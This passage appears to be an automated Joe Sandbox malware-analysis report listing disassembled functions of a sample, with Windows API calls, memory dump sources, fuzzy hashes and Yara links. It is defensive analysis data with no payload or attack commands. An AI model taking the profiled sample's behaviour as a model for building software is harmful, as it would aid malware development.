                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: 7f4645d2260e825826635f5fac30ca9cfc4b76df7dcc1d5b0124c0d56dbe9ad3
                                                                      • Instruction ID: 7779051a2dc4eed75465a7dade77b9c6ca935fd54bb3fd9472a0833bafd548a8
                                                                      • Opcode Fuzzy Hash: 7f4645d2260e825826635f5fac30ca9cfc4b76df7dcc1d5b0124c0d56dbe9ad3
                                                                      • Instruction Fuzzy Hash: 4701D636806248BFC7125BA7DC05BAE7A6DEFC1731F104219FA35962D0DB718D01C7A0
                                                                      Function 009C600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
                                                                      • GetStockObject.GDI32(00000011), ref: 009C6060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 56b7c417928b91f6fef2ea5ac346e2ca6c125ff3bdea2eb3d0aee2c30ec19e12
                                                                      • Instruction ID: 71fd74ba6fcf375e87dff4f5e8019cb7c77923cef1c8fa4f4e491809f13a7ac2
                                                                      • Opcode Fuzzy Hash: 56b7c417928b91f6fef2ea5ac346e2ca6c125ff3bdea2eb3d0aee2c30ec19e12
                                                                      • Instruction Fuzzy Hash: D5115E72501609BFEF128F959C54FEA7B6DFF0C3A5F050215FA1462110D7369C619B91
                                                                      Function 009E3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 009E3B56
                                                                        • Part of subcall function 009E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009E3AD2
                                                                        • Part of subcall function 009E3AA3: ___AdjustPointer.LIBCMT ref: 009E3AED
                                                                      • _UnwindNestedFrames.LIBCMT ref: 009E3B6B
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009E3B7C
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 009E3BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction ID: 7fcff65aed567fea1e9b5d2ef7236205692c6bcecb67fd6d9c96e879b31113e7
                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction Fuzzy Hash: BA01E932100189BBDF126E96CC46EEB7B6EEF98754F048054FE58A6121D732ED61DBA0
                                                                      Function 009F3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009C13C6,00000000,00000000,?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue), ref: 009F30A5
                                                                      • GetLastError.KERNEL32(?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue,00A62290,FlsSetValue,00000000,00000364,?,009F2E46), ref: 009F30B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue,00A62290,FlsSetValue,00000000), ref: 009F30BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: def06930bae7c9bc035dadeac535e5b8581610d486d9ed16488bbf98aa0125df
                                                                      • Instruction ID: 6741bf9b2f76b311de09ce1dc1edfa253a8c96ae5dea70b50ca2e3fdc5bb85ba
                                                                      • Opcode Fuzzy Hash: def06930bae7c9bc035dadeac535e5b8581610d486d9ed16488bbf98aa0125df
                                                                      • Instruction Fuzzy Hash: E101D83230132AAFC7218BB99C44D7B7B9CAF05BB1B188621FA05D7240CF29D942C7D0
                                                                      Function 00A27464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00A2747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A27497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A274AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A274CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 0bb02f8018af937454bab496cc20fe8e2303b127a92607345e33036bc488c95a
                                                                      • Instruction ID: 33e0688b32da5d8e3073ff50f1e0d2e8860b477e33b26092a152a3ac3a889448
                                                                      • Opcode Fuzzy Hash: 0bb02f8018af937454bab496cc20fe8e2303b127a92607345e33036bc488c95a
                                                                      • Instruction Fuzzy Hash: 0611A1B52053209FE720DF58EC08F9A7BFCFB00B10F508569E616D6151D770EA04DB51
                                                                      Function 00A2B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: cbe4695100f90a721e806e71f1b197a43d03281d4b3e5a264f8491769f5d1d69
                                                                      • Instruction ID: 96b5ff0bc261e185d36605a8ea8056466a0dde03870baf9cf1df8f1f67977091
                                                                      • Opcode Fuzzy Hash: cbe4695100f90a721e806e71f1b197a43d03281d4b3e5a264f8491769f5d1d69
                                                                      • Instruction Fuzzy Hash: 88116131C11A3DDBCF00EFE8E9686EEBB78FF49711F1042A5D941B2145CB3055518B61
                                                                      Function 00A22DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A22DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A22DD6
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A22DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A22DE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: d99e7b4b3a7d4e7e193922e3fca184f4f7342a363bfdfcb7a9a6e6e1c70aba9c
                                                                      • Instruction ID: 7f27a3bbb1a0d8a053f925f5935f1e4a0a002ab57013acd4c39165847751b4f9
                                                                      • Opcode Fuzzy Hash: d99e7b4b3a7d4e7e193922e3fca184f4f7342a363bfdfcb7a9a6e6e1c70aba9c
                                                                      • Instruction Fuzzy Hash: 1CE06D721013347BD7205BB6AC0DFEB7E6CFB42BB2F001125F105D10809AA4CA42C6B0
                                                                      Function 00A58863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                        • Part of subcall function 009D9639: BeginPath.GDI32(?), ref: 009D96B9
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A58887
                                                                      • LineTo.GDI32(?,?,?), ref: 00A58894
                                                                      • EndPath.GDI32(?), ref: 00A588A4
                                                                      • StrokePath.GDI32(?), ref: 00A588B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: 0c8d8ee6aa5b68e0c131a45f104404c5e26cd964817dda284cf01bc3f52d5e3b
                                                                      • Instruction ID: 90cf7f0431769ab17402854d9e1b1d6b4c1058c45676ace9914cca42e30a1d2a
                                                                      • Opcode Fuzzy Hash: 0c8d8ee6aa5b68e0c131a45f104404c5e26cd964817dda284cf01bc3f52d5e3b
                                                                      • Instruction Fuzzy Hash: 28F03A36141359BADB12AFD4AC09FCA3B59BF06362F448101FA21650E2CB795512CBA5
                                                                      Function 009D98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 009D98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 009D98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 009D98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 009D98F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 4037423528-0
                                                                      • Opcode ID: f434315db7bd961d119271a77df9d8de57594d3e172d80cdf7d08a082c4ff273
                                                                      • Instruction ID: 4c816f8f01f5e707a39922e1ca7152ea4ac340d0c48528d81efb35ce7b9fbf5e
                                                                      • Opcode Fuzzy Hash: f434315db7bd961d119271a77df9d8de57594d3e172d80cdf7d08a082c4ff273
                                                                      • Instruction Fuzzy Hash: 57E06D31284780AEDB219BB8BC09BEC3F21BB12336F04831AF6FA590E5C77146819B10
                                                                      Function 00A2162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00A21634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A211D9), ref: 00A2163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A211D9), ref: 00A21648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A211D9), ref: 00A2164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 8bf9fc18626c2bbbb469ae7ef74d87280994652b83d119181dc5ce8af4a5fc26
                                                                      • Instruction ID: a76a1ff5f3d4df33130a93c056000f54d1734d6dd05f4ce71daf67d5e3a7c700
                                                                      • Opcode Fuzzy Hash: 8bf9fc18626c2bbbb469ae7ef74d87280994652b83d119181dc5ce8af4a5fc26
                                                                      • Instruction Fuzzy Hash: 66E04F71602321AFD7205BE4AD0DB8A3B68BF54BA6F144818F245C9084D6244542C750
                                                                      Function 00A1D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00A1D858
                                                                      • GetDC.USER32(00000000), ref: 00A1D862
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A1D882
                                                                      • ReleaseDC.USER32(?), ref: 00A1D8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: ddf7934fb3b4020db0549a93fa5b9d6d26f730ddef91f22cc808f9fe0a11a112
                                                                      • Instruction ID: 4be4d21fbc0f6dbd04f380a4dc43be617a09555b2bcd3e7efb75a27bb64860b1
                                                                      • Opcode Fuzzy Hash: ddf7934fb3b4020db0549a93fa5b9d6d26f730ddef91f22cc808f9fe0a11a112
                                                                      • Instruction Fuzzy Hash: FBE075B5800305DFCB419FE0D908A6DBBB5FB48722B149459E84AE7654C7385A42AF51
                                                                      Function 00A1D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00A1D86C
                                                                      • GetDC.USER32(00000000), ref: 00A1D876
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A1D882
                                                                      • ReleaseDC.USER32(?), ref: 00A1D8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 639cffdfa0aaf890a08edde8c8646a85fc4a66e5ab42717b974f5e292efce43a
                                                                      • Instruction ID: dcd6af519eb08746324e0b7d1f4a7ca906c0b16251b2bb4430e4b906990f6394
                                                                      • Opcode Fuzzy Hash: 639cffdfa0aaf890a08edde8c8646a85fc4a66e5ab42717b974f5e292efce43a
                                                                      • Instruction Fuzzy Hash: E2E092B5C00304EFCF51EFE0E808A6DBBB5FB48722B149449E94AE7654CB385A02EF50
                                                                      Function 00A34D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A34ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: 77c0f2ff1f3b57ce1e3c034cf25edb6a4a0f9b5789383b93413b8dace1027f83
                                                                      • Instruction ID: 86f51391733095f67223552f7479db240d5d4ad67b1636f40c5d87a7679ff26f
                                                                      • Opcode Fuzzy Hash: 77c0f2ff1f3b57ce1e3c034cf25edb6a4a0f9b5789383b93413b8dace1027f83
                                                                      • Instruction Fuzzy Hash: 21915C75A002449FCB14DF58C484EAABBF1BF49704F188099F80A9F3A2D735EE85CB91
                                                                      Function 009EE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 009EE30D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 1c3f8216804f73f06b3116d5ca996e017889b7e8e6edb72e9bbcae8d09131a0b
                                                                      • Instruction ID: ed0c46b9fbf186df881965e9d0943752370137aa3330c368a9fc86ce2014b4ec
                                                                      • Opcode Fuzzy Hash: 1c3f8216804f73f06b3116d5ca996e017889b7e8e6edb72e9bbcae8d09131a0b
                                                                      • Instruction Fuzzy Hash: 2F51AF61A0C60A96CB13BB95CD01379BBACEB40740F304D59E1E5833F9EF348C929B46
                                                                      Function 009DE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: 15e6f394031c4341d8587ce65426b114123f17c58b26f14f05837dd9ce2c646a
                                                                      • Instruction ID: ea3c39bb60b016057d04d1f10528a3f4906bb1db1d142d59c3322704c9ea7b8d
                                                                      • Opcode Fuzzy Hash: 15e6f394031c4341d8587ce65426b114123f17c58b26f14f05837dd9ce2c646a
                                                                      • Instruction Fuzzy Hash: 7B514735940346DFEB15EF68C481AFA7BA8EF55310F24805AECA19F2D0D7349D82CB90
                                                                      Function 009DF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 009DF2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 009DF2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
